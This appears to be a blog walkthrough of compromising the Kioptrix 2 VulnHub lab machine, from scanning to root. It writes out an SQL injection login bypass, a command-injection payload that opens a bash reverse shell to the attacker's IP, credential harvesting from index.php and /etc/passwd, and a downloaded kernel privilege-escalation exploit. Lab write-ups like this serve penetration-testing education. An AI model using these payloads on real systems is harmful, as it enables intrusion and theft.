Kioptrix 2 Walkthrough

Kioptrix 2 VulnHub Walkthrough

I started this box with a netdiscover scan It found that it was ip 192.168.0.131

netdiscover -r 192.168.0.0/24


Discovered some open ports


SSH info


Apache webserver with version and OS info


Some info over https


Looks like this sites running php


We also have a cups server


And a mysql server that our IP isn’t permitted to connect to:


OS and kernel info


First thing I attempted to enum was the webserver. I browsed to 192.168.0.130 to find a login page.

tried to most basic ” ‘ or 1=1– ” for both username and password, and it logined me in successfully!


The prompt asked for a machine to ping, so let’s give it a try:


I tried to inject some code in the text box by trying a couple different syntax commands from various languages.

It seems like the box is running a bash script. Since “;” allowed for additional commands to be included in the user input variable, let see if we can get a reverse shell.

I issued a bash command to connect back to my machine 🙂

;bash -i >& /dev/tcp/192.168.0.129/1234 0>&1

After checking my present dir and looking at some of the files, I found a username and password in the index.php file


I also issed a cat /etc/passwd and found the user john on the sytem


I tried the mysql db first and was able to login


I looked through the databases and found a couple username and passwords


The admin password logged me into the web app just like the SQLi, but the john user just presented me with a blank screen. I tried these passwords in combination with john/admin/root over ssh, but no luck

I decided I needed some help, so I wanted to download linux exploit suggestor. I issued a command to find world writeable directories

/var/tmp looks like a good choice. I cd’d to that dir and downloaded LES.pl


It found a number of potential vulnerabilities

I tried a half_nelson exploit with no success, but on a second try, was successful with the sock_sendpage vuln. I downloaded the vuln to my kali machine, then issued a wget from the vuln vm


I chmod’d the file and ran it, now we have root!

Leave a Reply

Your email address will not be published. Required fields are marked *